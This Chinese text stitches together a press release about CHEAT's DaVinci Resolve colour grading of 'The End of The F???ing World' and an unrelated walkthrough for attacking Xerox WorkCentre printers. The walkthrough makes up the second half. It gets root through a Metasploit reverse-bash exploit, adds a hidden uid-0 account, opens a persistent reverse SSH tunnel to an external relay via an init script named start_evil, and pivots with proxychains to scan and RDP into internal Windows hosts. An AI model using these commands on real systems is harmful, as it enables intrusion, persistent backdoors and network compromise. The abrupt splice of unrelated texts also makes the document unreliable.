位于倫敦的后期制作公司CHEAT采用DaVinci Resolve Studio,為英國4頻道播出的由小說改編的電視劇《The End of The F???ing World》完成了最終數字中間片(DI)。
該劇改編自Charles Forsman的漫畫小說,講述了兩名叛逆少年之間開啟一段古怪離奇的戀情,同時攜手逃離故鄉傷心地的故事。
CHEAT的Toby Tomkins需要在十天里完成八集的調色工作,營造出濃厚的美式風情來補充黑暗的敘事,同時匹配不同的地點和時段。“我們參考了《革命之路》和《老無所依》,兩部片子的調色都很艷麗濃厚,膚色幾乎像皮革一樣紅,為角色增加了一定的溫暖度。 為了補充漫畫原本的黑暗色調,我們以此為基礎創造出了一種美式的效果和鮮明的印刷感。”他說。
CHEAT必須對50天的工作樣片,以及存在40個硬盤上100TB的7K和8K RAW素材進行套底,整個流程由Caroline Morin通過DaVinci Resolve的媒體文件管理工具完成。DI過程中使用的Linux工作站采用雙英特爾施樂E5-2600 v4處理器解拜耳R3D RAW文件,同時四臺通過Cubix Expander與工作站相連的Nvidia GTX 1080Ti GPU用于支持實時DI工作。
Tomkins利用DaVinci Resolve Advanced Panel創建了一組復雜的并行、串行和層節點來確定基本效果,然后通過混合LUT制作出劇中每個場景所需的獨特感覺。“劇中許多鏡頭都在路上拍攝,幾乎所有場景的地點和照明都不一樣。確定了基本風格后,我使用lift、gamma和gain根據照明比例和場景氛圍對其進行精修。”Toby說。
“Resolve的分組工具也幫了很大的忙。我可以在之前創建的節點樹中復合節點,自始至終保持復雜結構的邏輯性和組織性。我甚至可以對一系列鏡頭的節點進行波紋處理,節省了不少時間。”
由于后期制作的時間很緊,CHEAT沒有充足的時間制作關鍵幀,因此大量使用了DaVinci Resolve跟蹤器。“因為我相信Resolve能夠應對大量Power Window跟蹤工作,所以在二級調色前,我可以專心處理更復雜、分散的工作,比如膚色調整等。”
“能在一個應用程序中完成套底、調色和交付真的很方便。”Tomkins說。“DaVinci Resolve是一套靈活度很高的后期制作軟件,幫助我們創建開發了符合我們工作方式的工作流程。”
《The End of The F???ing World》目前在英國All 4頻道獨家播出,2018年初將在全球范圍上映。
一直以來我們都在討論多功能打印機(MFP)在企業環境下所帶來的風險,以及攻擊者如何輕易的利用其來進行惡意攻擊,比如通過LDAP提取WindowsActiveDirectory的證書或者濫用“掃描文件”和“掃描電子郵件”功能。
而在最近一次我們的攻防演練中,在通過MFP設備攻擊WindowsActiveDirectory時,我們利用該設備隱藏了我們的位置,這使得針對MFP設備的攻擊進入了新的階段。在本文中我們就來分享一下如何利用被盜用的XeroxWorkcentreMFP設備來進行APT的細節。
首先我們要確定該XeroxWorkcentreMFP設備在已經被入侵的網絡中很容易受到固件注入攻擊。實際上該技術早在2012年就已經被發表了,但由于缺乏對這一類物聯網設備的強制性更新,目前仍有大量的XeroxWorkcentreMFP設備會受到這種攻擊,這一點可以很容易的通過Metasploit中的xerox_mfp模塊來進行驗證。而如果設備并不容易遭受攻擊,或者攻擊的結果只能夠進行打印等操作,那顯然是毫無價值的。但是如果它存在嚴重漏洞可以使你獲得反向shell并最終拿到該設備的Root權限,那就相當的有價值了。
以下將向您展示通過Metasploit中的xerox_mfp模塊來實施此類攻擊。
[1]在Metasploit中選擇xerox_mfp模塊:
Useexploit/unix/misc/xerox_mfp
(http://www.rapid7.com/db/modules/exploit/unix/misc/xerox_mfp)
[2]接下來選擇反向bashpayload模塊并使用它:
Setpayloadcmd/unix/reverse_bash
[3]最后使用以下命令設置目標IP和本地IP:
setRHOSTipaddress setLHOSTipaddress
[4]這里建議你設置wfsdelay到30,因為當你在進行攻擊時打印機有可能進入睡眠模式,這樣做可以在你等待會話連接到監聽器時增加延時。
setwfsdelay30
[5]一旦完成上面的操作,你就可以通過輸入或者運行exploit來啟動exploit。
Xeroxexploit將會啟動固件注入攻擊并返回一個可以接入MFProot權限的遠程shell。
如下圖所示:
建立并啟用SSHD
當你獲得了該MFP設備的root訪問權限后,需要進行一些必要的配置,以便能夠啟用SSH隧道。第一步是建立SSH主機密鑰,使你可以啟動MFP設備上的SSH進程。
具體步驟如下:
輸入以下命令來生成dsa和rsa密鑰對:
ssh-keygen-tdsa-f/etc/ssh/ssh_host_dsa_key ssh-keygen-trsa-f/etc/ssh/ssh_host_rsa_key
當有提示要輸入密碼時直接回車,下圖是生成密鑰的一個例子:
現在你可以使用下面的命令開啟SSH的進程:
/usr/sbin/sshd
而當其開始運行后,如下命令可以進行驗證:
ps–ef|grepsshd
下圖中我們可以看到SSH進程已啟動,在本例中其進程ID為17808。 version1的錯誤屬于正常情況。
建立并啟用密鑰認證
現在SSH進程正在運行,我們需要生成公鑰和私鑰,這樣將允許從打印機發起的到我們在公網上的SSH服務器的SSH連接,本次我們將這個公網上的SSH服務器命名為”bouncebox“。
首先我們要在打印機的根目錄下創建一個.ssh的文件夾,當SSH密鑰生成后將保存在該文件夾中。使用以下命令進行該操作:
cd/&&mkdir.ssh&&cd.ssh
文件夾建立后我們繼續來生成SSH密鑰,使用以下命令即可:
ssh-keygen-trsa
這里系統會提示新生成的密鑰保存在.ssh文件夾的默認位置,我們只需敲擊回車即可,而當提示輸入密碼時也一樣。
后面我們會驗證SSH密鑰已經被正確的創建了。不過現在我們需要將SSH公鑰添加到公網ssh服務器bouncebox的authorized_keys文件中。使用下面的命令:
cat/.ssh/id_rsa.pub(onprinter) vi~/.ssh/authorized_keys(onbouncebox)
既然該密鑰已經在我們的bouncebox中配置好了,那么我們就可以建立一個從打印機到bouncebox的SSH連接,且無需處理密碼提示。
注意:允許打印機SSH連接到你的bouncebox,這意味著允許任何接入打印機的人做相同的事,所以你需要非常確定你的bouncebox中沒有存放任何敏感數據。
建立用戶賬戶
雖然我們可以使用root權限對MFP設備進行訪問,但我們沒有密碼。因此除非你想花時間破解它否則最好的方法就是去創建一個用戶然后將該用戶添加到root組,使我們可以在SSH隧道操作過程中使用它。不幸的是安裝在XeroxWorkcentresMFP上的嵌入式LinuxWindRiver版本沒有adduser命令,所以需要我們手動進行創建,而這將需要改變三個文件。更大的問題是缺少一個好用的編輯器,因為在bashshell中VI編輯器并不是那么好用。
所以保險起見我們應該首先把要編輯的三個文件進行備份:
cp/etc/passwd/etc/passwd.bck cp/etc/shadow/etc/shadow.bck cp/etc/group/etc/group.bck
我總是會在繼續操作之前先驗證我的文件是否已經備份好了,通過下面的這個命令即可。如圖所示:
ls-al/etc/*.bck
我們要改變的第一個文件是/etc/passwd,這里我們會使用以下命令添加新的用戶信息到該文件中。這里非常重要的一點是不要將雙重定向>>和>重定向弄混,>重定向將會將文件的所有內容進行重寫,但如果真的弄混了也不要慌張,因為我們有備份。
echo“bob:x:0:0:root:/:/bin/bash”>>/etc/passwd
如果一切正確你的password文件應該和下圖一樣:
下一個要修改的文件是/etc/shadow。該修改是通過使用echo和雙重定向>>來添加數據到該文件。
輸入下面這行命令即可進行這一修改:
echo“bob:E9lQCJhXRn9sc:16781::::::”>>/etc/shadow
完成這一操作后你的shadow文件像下圖一樣即可:
最后需要修改的文件是/etc/group。這里需要進行兩次修改,第一次是將新用戶的信息添加到文件的末尾,使用如下命令:
echo“bob:x:102:”>>/etc/group
第二次修改涉及到使用sed命令將上面的bob用戶添加到其中。使用下面這行命令:
sed-i's/root:x:0:root/root:x:0:root,bob/'/etc/group.tmp
完成上述操作后你的組文件應該如下圖所示:
在完成了對三個文件的修改后,我們還需要對bob的密碼進行修改,因為我不確定shadow文件中的字符串(E9lQCJhXRn9sc)將會有什么影響,而更糟糕的狀況可能是它給了你一個類似“test123”的密碼。所以你需要通過下面這行命令以及提示去修改密碼:
passwdbob
一旦密碼確認被修改后,你會看到如下圖所示:
開啟反向隧道到BounceBox
現在SSH密鑰已經就位了,sshd已經在運行了并且用戶賬戶也已經創建好了,那么接下來你需要去啟動在MFP設備上的SSH隧道。以下命令將會通過MFP設備的22端口連接到你的bouncebox上的12345端口,請記住要把bouncebox的IP地址設置正確,并且要添加rsa_id.pub中的用戶名到known_hosts。
/usr/bin/ssh-N-R12345:localhost:[email?protected]
建立反向SSH隧道將本地主機連接到MFP設備
打印機成功建立了一個出站SSH連接到bouncebox后,我們可以使用此隧道進入目標網絡。這一步可以通過使用一系列的SSH命令創建反向SSH通道來實現。
首先,使用-L選項從SSH進入bouncebox。正如手冊所述,-L選項是將本地主機上的指定端口轉發到指定主機的遠程端口:
ssh-L31337:localhost:[email?protected]
在該例子中,我們將本地的31337端口(攻擊機)的流量轉發到bouncebox(公網轉發主機)的12345端口,再由bouncebox上的12345端口將流量轉發到MFP設備(內網中)的22端口。
現在我們已經在bouncebox上建立了端口轉發,就可以通過本地(攻擊機)SSH的31337端口連接到打印機。然后使用-D選項允許動態端口轉發,這將使得SOCKS服務器會允許我們通過打印機的網絡接口去發送流量,比如攻擊者機器通過bouncebox發動對目標網絡即打印機端的端口掃描。
[email?protected]
保證持續性
如果你想保持持續性控制,那么你就需要將其加入到系統啟動文件中。在這個例子中,XeroxWorkcentreMFP設備并沒有Crontab功能。我發現最好的方式是在/etc/init.d中創建一個文件,然后在/etc/rc.d/rc3.d目錄文件夾中通過符號鏈接指向該文件。這將確保每一次打印機復位或者重啟時,你的隧道都可以被重建,而這也就是為什么會把它稱為高級持續性威脅(APT)。
現在我們已經有sshd在運行了,所以完全不需要再使用Metasploit通過反向bashshell去連接到MFP設備了。如果你按照上述指令來進行的操作,你應該能夠使用以下命令從你的主機系統登陸到MFP設備:
[email?protected]
在VI中添加下述命令到文件中并保存:
#!/bin/bash # #startupsshdaemonservice /usr/sbin/sshd #initiatethesshtunneltothebouncebox /usr/bin/ssh-N-R12345:localhost:[email?protected]
最后一步是在/etc/rc.d/rc3.d/文件夾中建立一個符號鏈接,使用以下命令即可:
cd/etc/rc.d/rc3.d/ ln-s/etc/rc.d/init.d/start_evilS777_start_evil
好了,現在如果MFP設備復位或者重啟的話,你的ssh隧道也仍然能夠重新連接到bouncebox了。
使用ProxyChains和SOCKS代理
為了能夠使用攻擊工具,我們使用了代理服務器軟件ProxyChains,它能夠允許我們通過之前建立的動態端口轉發進行通信。
在攻擊機上,我們安裝了ProxyChains,使得我們能夠使用動態端口轉發。我們編輯了這個配置文件/etc/proxychains.conf,然后添加了下面這行:
socks4127.0.0.11080
(動態的將1080端口的流量轉發到了31337端口,31337端口將流量轉發到bouncebox的12345端口,12345端口將流量轉發到內網MFP設備的22端口)
ProxyChains配置完成后,我們就可以開始使用攻擊工具了。在下面的例子中我們使用端口掃描工具nmap去掃描目標網絡下的windows系統。使用以下命令即可:
proxychainsnmap-Pn-sT192.168.2.72-p445,3389
在識別出一個windows系統后,我們就可以使用以下命令去連接到遠程桌面服務:
proxychainsrdesktop192.168.2.72
作為一個POC,我們通過遠程桌面服務登錄到windows系統,然后運行netstat命令去查看建立的連接。這里我們可以看到打印機(192.168.2.200)正在監聽一個從windows服務器(192.168.2.72)到遠程桌面端口3389的連接。